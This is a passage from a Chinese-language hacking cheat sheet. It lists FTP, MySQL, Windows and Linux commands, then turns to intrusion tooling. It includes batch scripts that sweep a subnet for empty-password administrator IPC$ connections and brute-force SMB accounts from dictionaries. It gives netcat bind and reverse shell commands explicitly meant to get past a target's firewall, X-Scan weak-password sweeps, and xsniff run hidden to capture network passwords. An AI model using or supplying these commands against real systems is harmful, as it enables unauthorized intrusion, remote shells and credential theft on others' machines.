open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

#6 六：

Linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。

#7 七：

2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

#8 八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出